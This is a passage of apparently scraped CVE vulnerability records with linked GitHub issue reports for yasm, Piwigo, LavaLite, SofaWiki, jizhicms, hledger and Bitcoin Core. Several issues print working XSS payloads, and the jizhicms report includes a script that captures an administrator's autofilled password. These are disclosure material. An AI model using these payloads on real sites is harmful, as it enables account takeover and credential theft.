"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/yasm/yasm/issues/221"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.55.g101bc:*:*:*:*:*:*:*",
"matchCriteriaId": "4A03B4FD-736D-40B7-87B0-AC4EF2660C4B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"416"
] | 416 | https://github.com/yasm/yasm/issues/221 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"yasm",
"yasm"
] | # There exists heap-use-after-free in yasm/modules/preprocs/nasm/nasm-pp.c:3878 in expand_mmac_params
## asan info:
```
==708699==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e0000012a8 at pc 0x55647c385147 bp 0x7ffe09f5d870 sp 0x7ffe09f5d860
READ of size 8 at 0x60e0000012a8 thread T0
#0 0x55647c385146 in expand_mmac_params modules/preprocs/nasm/nasm-pp.c:3878
#1 0x55647c38d436 in pp_getline modules/preprocs/nasm/nasm-pp.c:5078
#2 0x55647c36ac61 in nasm_preproc_get_line modules/preprocs/nasm/nasm-preproc.c:198
#3 0x55647c35f4ed in nasm_parser_parse modules/parsers/nasm/nasm-parse.c:219
#4 0x55647c35df6c in nasm_do_parse modules/parsers/nasm/nasm-parser.c:66
#5 0x55647c35e109 in nasm_parser_do_parse modules/parsers/nasm/nasm-parser.c:83
#6 0x55647c2f64d4 in do_assemble frontends/yasm/yasm.c:521
#7 0x55647c2f7281 in main frontends/yasm/yasm.c:753
#8 0x7fc63b1af082 in __libc_start_main ../csu/libc-start.c:308
#9 0x55647c2f4b9d in _start (/root/target/yasm/build_asan/bin/yasm+0xa5b9d)
0x60e0000012a8 is located 8 bytes inside of 160-byte region [0x60e0000012a0,0x60e000001340)
freed by thread T0 here:
#0 0x7fc63b48a40f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:122
#1 0x55647c331974 in def_xfree libyasm/xmalloc.c:113
#2 0x55647c370a59 in free_mmacro modules/preprocs/nasm/nasm-pp.c:1163
#3 0x55647c38cc0a in pp_getline modules/preprocs/nasm/nasm-pp.c:5009
#4 0x55647c36ac61 in nasm_preproc_get_line modules/preprocs/nasm/nasm-preproc.c:198
#5 0x55647c35f4ed in nasm_parser_parse modules/parsers/nasm/nasm-parse.c:219
#6 0x55647c35df6c in nasm_do_parse modules/parsers/nasm/nasm-parser.c:66
#7 0x55647c35e109 in nasm_parser_do_parse modules/parsers/nasm/nasm-parser.c:83
#8 0x55647c2f64d4 in do_assemble frontends/yasm/yasm.c:521
#9 0x55647c2f7281 in main frontends/yasm/yasm.c:753
#10 0x7fc63b1af082 in __libc_start_main ../csu/libc-start.c:308
previously allocated by thread T0 here:
#0 0x7fc63b48a808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
#1 0x55647c331857 in def_xmalloc libyasm/xmalloc.c:69
#2 0x55647c37ffc8 in do_directive modules/preprocs/nasm/nasm-pp.c:3211
#3 0x55647c38d446 in pp_getline modules/preprocs/nasm/nasm-pp.c:5083
#4 0x55647c36ac61 in nasm_preproc_get_line modules/preprocs/nasm/nasm-preproc.c:198
#5 0x55647c35f4ed in nasm_parser_parse modules/parsers/nasm/nasm-parse.c:219
#6 0x55647c35df6c in nasm_do_parse modules/parsers/nasm/nasm-parser.c:66
#7 0x55647c35e109 in nasm_parser_do_parse modules/parsers/nasm/nasm-parser.c:83
#8 0x55647c2f64d4 in do_assemble frontends/yasm/yasm.c:521
#9 0x55647c2f7281 in main frontends/yasm/yasm.c:753
#10 0x7fc63b1af082 in __libc_start_main ../csu/libc-start.c:308
SUMMARY: AddressSanitizer: heap-use-after-free modules/preprocs/nasm/nasm-pp.c:3878 in expand_mmac_params
Shadow bytes around the buggy address:
0x0c1c7fff8200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1c7fff8210: 00 00 00 00 fa fa fa fa fa fa fa fa 00 00 00 00
0x0c1c7fff8220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1c7fff8230: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c1c7fff8240: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
=>0x0c1c7fff8250: fa fa fa fa fd[fd]fd fd fd fd fd fd fd fd fd fd
0x0c1c7fff8260: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
0x0c1c7fff8270: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c1c7fff8280: fd fd fd fd fa fa fa fa fa fa fa fa fd fd fd fd
0x0c1c7fff8290: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c1c7fff82a0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==708699==ABORTING
```
## Command Input:
./yasm poc-file
[poc-file.zip](https://github.com/yasm/yasm/files/11253102/poc-file.zip)
poc-file is attached.
## Environment
OS: Ubuntu 20.04.1
yasm: 1.3.0.55.g101bc (git clone [git@github.com](mailto:git@github.com):yasm/yasm.git , and compile it)
compile yasm with asan:
./autogen.sh
make distclean
./configure --prefix=$PWD/build_asan
make CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g"
make install | There exists heap-use-after-free in yasm/modules/preprocs/nasm/nasm-pp.c:3878 in expand_mmac_params | https://api.github.com/repos/yasm/yasm/issues/221/comments | 1 | 2023-04-17T16:39:42Z | 2024-03-22T11:51:42Z | https://github.com/yasm/yasm/issues/221 | 1,671,576,475 | 221 | 5,158 |
CVE-2023-27233 | 2023-05-17T20:15:09.933 | Piwigo before 13.6.0 was discovered to contain a SQL injection vulnerability via the order[0][dir] parameter at user_list_backend.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gist.github.com/renanavs/dcb13bb1cd618ce7eb0c80290b837245"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1872"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gist.github.com/renanavs/dcb13bb1cd618ce7eb0c80290b837245"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1872"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:*",
"matchCriteriaId": "86097A18-F13B-45AC-B24B-5A879C3A2DE2",
"versionEndExcluding": "13.6.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Piwigo/Piwigo/issues/1872 | [
"Release Notes"
] | github.com | [
"Piwigo",
"Piwigo"
] | Without entering too much into details there is a possible SQL injection in file `admin/user_list_backend.php`. This file has no reason to be still in Piwigo since version 12 and the new user manager (which relies on `ws.php` as backend). This file must simply be removed. | [13.x] SQL injection on user_list_backend.php | https://api.github.com/repos/Piwigo/Piwigo/issues/1872/comments | 0 | 2023-02-24T08:42:01Z | 2023-02-24T08:42:44Z | https://github.com/Piwigo/Piwigo/issues/1872 | 1,598,184,264 | 1,872 | 5,159 |
CVE-2023-30124 | 2023-05-18T01:15:09.163 | LavaLite v9.0.0 is vulnerable to Cross Site Scripting (XSS). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LavaLite/cms/issues/389#issue-1636041104"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LavaLite/cms/issues/389#issue-1636041104"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:lavalite:lavalite:9.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6150AF5B-17E6-4BFB-9980-F181A335022D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/LavaLite/cms/issues/389#issue-1636041104 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LavaLite",
"cms"
] | # I find a Stored XSS
client user can use this vulnerability to attack administrator users,Can use js to send post request, indirectly operate the administrator account,a serious threat to website security。
# exploit
client login site,and modify the account name to `</span><img src=1 onerror=alert(1) /><span>`
now,if super user login and look clients,Will trigger XSS。

Hackers can exploit this vulnerability to perform any action by the administrator. | There is a Stored XSS | https://api.github.com/repos/LavaLite/cms/issues/389/comments | 0 | 2023-03-22T15:44:16Z | 2023-08-13T10:30:29Z | https://github.com/LavaLite/cms/issues/389 | 1,636,041,104 | 389 | 5,160 |
CVE-2023-29720 | 2023-05-18T20:15:09.357 | SofaWiki <=3.8.9 is vulnerable to Cross Site Scripting (XSS) via index.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/bellenuit/sofawiki/issues/26"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/xul18/Showcase/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/bellenuit/sofawiki/issues/26"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/xul18/Showcase/issues/1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sofawiki_project:sofawiki:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7860B5D2-9810-4846-89E3-1CE46CA3194A",
"versionEndExcluding": null,
"versionEndIncluding": "3.8.9",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/bellenuit/sofawiki/issues/26 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"bellenuit",
"sofawiki"
] | 1. The variable name is being sanitized for XSS using the function swSimpleSanitize().
```
// index.php
$name = swGetArrayValue($_REQUEST,'name',$swMainName);
$name = swSimpleSanitize($name); // XSS
```
2. The function swSimpleSanitize() only filters "<" and ">".
```
// /inc/utilities.php
function swSimpleSanitize($s)
{
// filters out XSS input to be used on variables that should not habe html code or exec code
$s = str_replace("<","",$s);
$s = str_replace(">","",$s);
return $s;
}
```
3. Use payload to trigger reflected XSS.
**http://*.*.*.*/index.php?name=test%22%20onmouseover=alert(/xss/);%22**


| [Vuln]There is a reflected XSS vulnerability. | https://api.github.com/repos/bellenuit/sofawiki/issues/26/comments | 1 | 2023-03-15T04:52:26Z | 2023-03-15T20:09:32Z | https://github.com/bellenuit/sofawiki/issues/26 | 1,624,742,932 | 26 | 5,161 |
CVE-2023-29720 | 2023-05-18T20:15:09.357 | SofaWiki <=3.8.9 is vulnerable to Cross Site Scripting (XSS) via index.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/bellenuit/sofawiki/issues/26"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/xul18/Showcase/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/bellenuit/sofawiki/issues/26"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/xul18/Showcase/issues/1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sofawiki_project:sofawiki:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7860B5D2-9810-4846-89E3-1CE46CA3194A",
"versionEndExcluding": null,
"versionEndIncluding": "3.8.9",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/xul18/Showcase/issues/1 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"xul18",
"Showcase"
] | **the name of an affected Product:** SofaWiki
**the affected or fixed version(s):** SofaWiki < 3.8.9 Hotfix 8e1a572
**the CVE ID for the entry (if possible):** CVE-2023-29720
**a prose description:** SofaWiki is a filebased CMS built on PHP.There is a reflected XSS vulnerability.Details can be seen in [https://github.com/bellenuit/sofawiki/issues/26](**https://github.com/bellenuit/sofawiki/issues/26**)
**Vulnerability Type:** XSS
**Root Cause:** The variable name is being sanitized for XSS using the function swSimpleSanitize(). Only filters "<" and ">".
**Impact:** Low | XSS | https://api.github.com/repos/xul18/Showcase/issues/1/comments | 0 | 2023-05-18T07:25:11Z | 2023-05-18T07:25:21Z | https://github.com/xul18/Showcase/issues/1 | 1,715,156,164 | 1 | 5,162 |
CVE-2023-31862 | 2023-05-19T13:15:08.920 | jizhicms v2.4.6 is vulnerable to Cross Site Scripting (XSS). The content of the article published in the front end is only filtered in the front end, without being filtered in the background, which allows attackers to publish an article containing malicious JavaScript scripts by modifying the request package. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Cherry-toto/jizhicms/issues/86"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Cherry-toto/jizhicms/issues/86"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jizhicms:jizhicms:2.4.6:*:*:*:*:*:*:*",
"matchCriteriaId": "04F7D759-846C-44B6-970B-81213312CBE0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/Cherry-toto/jizhicms/issues/86 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Cherry-toto",
"jizhicms"
] | The content of the article published in the front end is only filtered in the front end, without being filtered in the background, which allows attackers to publish an article containing malicious JavaScript scripts by modifying the request package. However, the backend administrator clicking on the article preview will launch this malicious JavaScript script

When submitting, you can see that the post request sent is:

Modify the submitted content to:
%3Cp%3Etest%3C%2Fp%3E%3Cp%3E%3Cscript%3Ealert('xss')%3C%2Fscript%3E

At this point, if the administrator previews the submitted article, a pop-up window will appear


At this point, it indicates that the embedded JavaScript script has been maliciously executed
I know that the entire system's cookies have been set to HttpOnly, which makes it impossible to obtain cookies through JavaScript scripts. However, if the administrator has enabled the browser's "automatic password filling" function, then the attacker can construct the following JavaScript script to obtain the administrator's plaintext password:
```
<p>test</p>
<form method="post" class="layui-form" onsubmit="return false;" hidden>
<input name="cache" id="cache" type="hidden" value="" />
<select name="lang" lay-filter="lang">
<option value="">选择语言</option>
<option selected value="zh_cn">中文简体</option>
<option value="zh_cht">中文繁体</option>
</select>
<hr class="hr15">
<input name="username" placeholder="用户名" type="text" lay-verify="required" class="layui-input" >
<hr class="hr15">
<input name="password" lay-verify="required" placeholder="密码" type="password" class="layui-input">
<hr class="hr15">
<input value="登录" lay-submit lay-filter="login" style="width:100%;" type="submit">
<hr class="hr20" >
</form>
<script>
setTimeout(function() {
const password = document.getElementsByName('password')[0].value;
alert(`the password is:${password}`);
}, 5000);
</script>
```
Submit the script after URL encoding

Administrator clicks on preview:

Here, the password plaintext has been pop-up displayed through the JavaScript script. If the pop-up function is modified to send the password plaintext to the attacker's server, the attacker will successfully obtain the administrator's plaintext password without the administrator's awareness
Modification suggestions:
Please filter the content of the article on the backend
| jizhicms v2.4.6 has a XSS vulnerability in the post article | https://api.github.com/repos/Cherry-toto/jizhicms/issues/86/comments | 5 | 2023-04-23T03:02:05Z | 2023-04-25T08:37:50Z | https://github.com/Cherry-toto/jizhicms/issues/86 | 1,679,831,200 | 86 | 5,163 |
CVE-2021-46888 | 2023-05-21T20:15:09.240 | An issue was discovered in hledger before 1.23. A Stored Cross-Site Scripting (XSS) vulnerability exists in toBloodhoundJson that allows an attacker to execute JavaScript by encoding user-controlled values in a payload with base64 and parsing them with the atob function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/simonmichael/hledger/issues/1525"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/simonmichael/hledger/pull/1663"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/simonmichael/hledger/releases/tag/1.23"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.youtube.com/watch?v=QnRO-VkfIic"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/simonmichael/hledger/issues/1525"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/simonmichael/hledger/pull/1663"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/simonmichael/hledger/releases/tag/1.23"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.youtube.com/watch?v=QnRO-VkfIic"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hledger:hledger:*:*:*:*:*:*:*:*",
"matchCriteriaId": "600B56CE-4478-4153-A735-BE58CC01399E",
"versionEndExcluding": "1.23",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/simonmichael/hledger/issues/1525 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"simonmichael",
"hledger"
] | hledger-web's forms sanitise obvious javascript, but not obfuscated javascript (cf https://owasp.org/www-community/xss-filter-evasion-cheatsheet). This means hledger-web instances, especially anonymously-writable ones like demo.hledger.org, could be loaded with malicious javascript to be executed by subsequent visitors. Reported by Gaspard Baye and Hamidullah Muslih, who also provided a video and example of such js which I can share.
hledger-web processes forms with runFormPost, part of [yesod-form](https://hackage.haskell.org/package/yesod-form). I am guessing that makes use of [xss-sanitize](https://hackage.haskell.org/package/xss-sanitize) ? But note sanitising and escaping are different (https://github.com/yesodweb/haskell-xss-sanitize#readme). I get the impression it may be impossible to escape/sanitise with 100% reliability; if so, what should we do ? Tighten up sanitization as much as we can and document that anonymous-writable hledger-web's are unsafe and not recommended, and make demo.hledger.org read only ?
I would appreciate any help diagnosing and resolving this. Questions to be answered:
- which libraries are involved here - yesod-form, xss-sanitize, ... ?
- are we getting the most protection available from them ?
- should we open bugs against any of them ?
- is it ok for me to share an example of obfuscated js here ?
- are there any public hledger-web instances other than demo.hledger.org ?
- is reliable escaping/sanitisation possible ?
- if not, what should be done for hledger-web ?
| XSS vulnerability: malicious javascript can be stored via hledger-web add/edit | https://api.github.com/repos/simonmichael/hledger/issues/1525/comments | 4 | 2021-04-11T03:48:02Z | 2023-07-22T06:25:59Z | https://github.com/simonmichael/hledger/issues/1525 | 855,210,963 | 1,525 | 5,164 |
CVE-2023-33297 | 2023-05-22T05:15:09.460 | Bitcoin Core before 24.1, when debug mode is not used, allows attackers to cause a denial of service (e.g., CPU consumption) because draining the inventory-to-send queue is inefficient, as exploited in the wild in May 2023. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Not Applicable"
],
"url": "https://en.bitcoin.it/wiki/Common_Vulnerabilities_and_Exposures"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/bitcoin/bitcoin/blob/master/doc/release-notes/release-notes-24.1.md"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/bitcoin/bitcoin/issues/27586"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/bitcoin/bitcoin/issues/27623"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/bitcoin/bitcoin/pull/27610"
},
{
"source": "cve@mitre.org",
"tags": null,
